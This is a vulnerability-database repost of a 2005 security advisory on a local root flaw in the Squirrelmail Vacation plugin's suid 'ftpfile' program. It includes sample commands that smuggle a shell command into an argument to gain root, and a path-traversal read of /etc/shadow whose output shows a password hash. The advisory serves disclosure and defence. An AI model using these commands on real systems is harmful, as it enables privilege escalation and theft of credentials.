Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LSS-2005-01-03.txt

🗓️ 12 Jan 2005 00:00:00Reported by Leon JuranicType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 16 Views

Local root exploit in Squirrelmail vacation plugin allows privilege escalation and file read.

Code
`  
LSS Security Advisory #LSS-2005-01-03  
http://security.lss.hr  
  
---  
  
Title : Squirrelmail vacation v0.15 local root exploit   
Advisory ID : LSS-2005-01-03  
Date : 10.01.2005.   
Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03  
Impact : Privilege escalation and arbitrary file read  
Risk level : High   
Vulnerability type : Local  
Vendors contacted : No response from vendor  
  
  
---  
  
  
  
===[ Overview   
  
Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply  
message to incoming email. That is commonly used to notify the sender of   
the receiver's absence. Vacation plugin specifically uses the Vacation program.  
Plugin can be downloaded from:  
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz  
  
  
  
===[ Vulnerability  
  
Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.  
The program is used to access local files in user's home directory. There is  
a privilege escalation and arbitrary file read vulnerability in ftpfile.   
Command line arguments are passed to execve() function without checking  
for meta-characters, therefore making possible execution of commands as root.  
  
[ljuranic@laptop ljuranic]$ id  
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"  
/bin/cp: omitting directory `/root/0'  
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$   
  
It is also possible to read restricted files (such as /etc/shadow), since  
ftpfile can copy a file from user's home directory to any other  
directory without checking file name for directory traversal attack.  
  
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow  
./shadow[ljuranic@laptop ljuranic]$ head ./shadow  
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::  
bin:*:10929:0:99999:7:::  
daemon:*:10929:0:99999:7:::  
lp:*:10929:0:99999:7:::  
[ljuranic@laptop ljuranic]$   
  
  
  
===[ Affected versions  
  
Squirrelmail Vacation v0.15 and previous versions.  
  
  
  
===[ Fix  
  
Not available yet.  
  
  
  
===[ PoC Exploit  
  
http://security.lss.hr/exploits/  
  
  
  
===[ Credits  
  
Credits for this vulnerability goes to Leon Juranic.   
  
  
  
===[ LSS Security Contact  
  
LSS Security Team, <eXposed by LSS>  
  
WWW : http://security.lss.hr  
E-mail : [email protected]  
Tel : +385 1 6129 775  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
squirrelmail vacation exploit privilege escalation arbitrary file read high risk vulnerability local vulnerability ftpfile program directory traversal attack
16